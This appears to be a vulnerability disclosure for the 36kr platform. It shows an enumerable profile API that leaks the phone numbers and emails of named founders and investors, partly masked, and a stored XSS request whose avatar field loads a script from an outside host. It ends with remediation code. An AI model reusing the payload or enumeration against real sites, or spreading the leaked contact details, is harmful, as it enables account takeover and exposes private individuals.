36kr user information leakage: contact information of all investors/founders + stored XSS
When I met an investor this morning, he said, "Let me remember your team in 10 seconds." I thought about it and gave him a slap. While he was still stunned, I ran off quickly. I have just received a text message asking me to go into the details tomorrow. Should I go?
Test environment:
Note2 + 36kr Android 2.1.0
1. Unauthorized access to the app API to obtain user information
Register and log in to rong.36kr.com; I verified the account by text message.
API URL:
http://rong.36kr.com/api/v1/ios-user/-ID-/profile
The ID can be enumerated. For example, you can view the contact information of the founder of the Note app:
View the founder's contact information:
http://rong.36kr.com/api/v1/ios-user/711/profile (you need to log in to your account first)
"user": {"avatar": "http://krplus-pic.b0.upaiyun.com/201503/23195614/7be9e2cc259d7834.jpg", "email": "laputan[mosaic]@fotoplace.cc", "enterpriser": 1, "id": 711, "investorType": 100, "isDisplayWeixin": false, "name": "Willow", "nickAvatar": "http://wx.qlogo.cn/mmopen/ajNVdqHZLLAl21jrHaCHQzgF1DrAsBDIJ1RJ3Hvvr8PCfmCQIkfbBHKoItkKTgDBV4SDZSFgiaoZUs4sdR7udXQ/0", "nickName": "Willow (fotoplace)", "phone": "13918331[mosaic]"}}, "msg": "operation successful!"}
View an investor's contact information:
http://rong.36kr.com/api/v1/ios-user/28633/profile
"user": {"avatar": "http://krplus-pic.b0.upaiyun.com/c00dd2691e0937663493df104fb18976", "email": "[mosaic]", "enterpriser": 0, "id": 28633, "intro": "Hirst Capital China Investment Director", "investorType": 20, "isDisplayWeixin": false, "linkedin": "", "name": "Hu Ying Qing", "nickName": "1350199[mosaic]", "phone": "1350199[mosaic]", "weibo": ""}
---------------------------------------------------------------------------------------
2. Stored XSS
The app uploads an avatar, and the page then references the stored image address directly.
This is the request for updating the avatar:
PUT /api/v1/user/<my id>/basic HTTP/1.1
Cookie: <my cookie information>
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Host: rong.36kr.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

avatar=http://krplus-pic.b0.upaiyun.com/xxxxxx.jpg"><script src=http://t.cn/xxx></script>
The avatar parameter is user-controlled and is not filtered, so XSS code can be injected. The effect is as follows:
The key token in the cookie should be protected with the HttpOnly flag.
Solution:
For the XSS I only tested the app's profile picture; check the user name and the other personal information fields as well.
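The two server-side fixes the report points at, written as an added example (not the page's or 36kr's own code): a validator for the avatar field of PUT /api/v1/user/<id>/basic (host allow-list plus a strict path pattern, so the "><script ...> payload above cannot be stored), attribute-encoding when the stored value is rendered, and an owner-only check for GET /api/v1/ios-user/<id>/profile so phone and email are not returned for arbitrary IDs. Field names follow the JSON in the report; the allow-listed host set, the sample record and the owner-only rule are assumptions.

```python
import re
from html import escape
from urllib.parse import urlsplit

# CDN host the report shows avatars being served from (assumption: the only valid host).
ALLOWED_AVATAR_HOSTS = {"krplus-pic.b0.upaiyun.com"}
# Path limited to a conservative character set: the quote and angle brackets that the
# report's payload relies on cannot pass this pattern.
AVATAR_PATH_RE = re.compile(r"^/[A-Za-z0-9_./-]{1,200}$")
# Contact fields that the profile endpoint currently returns to any logged-in user.
CONTACT_FIELDS = ("phone", "email", "weibo", "linkedin")


def validate_avatar_url(value: str) -> bool:
    """Server-side check for the `avatar` field before it is stored."""
    try:
        parts = urlsplit(value)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_AVATAR_HOSTS:
        return False
    if parts.username or parts.port or parts.query or parts.fragment:
        return False
    return AVATAR_PATH_RE.fullmatch(parts.path) is not None


def render_avatar_tag(avatar_url: str) -> str:
    """Defence in depth: attribute-encode the stored value when rendering it into HTML,
    so a value that slipped past validation still cannot close the src attribute."""
    return '<img src="%s" alt="avatar">' % escape(avatar_url, quote=True)


def profile_view(requester_id: int, record: dict) -> dict:
    """Authorization for the profile endpoint: only the record owner receives the
    contact fields; any other authenticated user gets the public subset. (Explicitly
    shared contacts would need an extra rule; that is out of scope here.)"""
    if requester_id == record["id"]:
        return dict(record)
    return {k: v for k, v in record.items() if k not in CONTACT_FIELDS}


# Constructed sample record in the shape of the report's JSON; the values are made up.
SAMPLE_RECORD = {
    "id": 28633, "name": "Sample Investor", "intro": "Investment Director",
    "investorType": 20, "isDisplayWeixin": False, "linkedin": "", "weibo": "",
    "email": "investor@example.com", "phone": "13500000000",
}
```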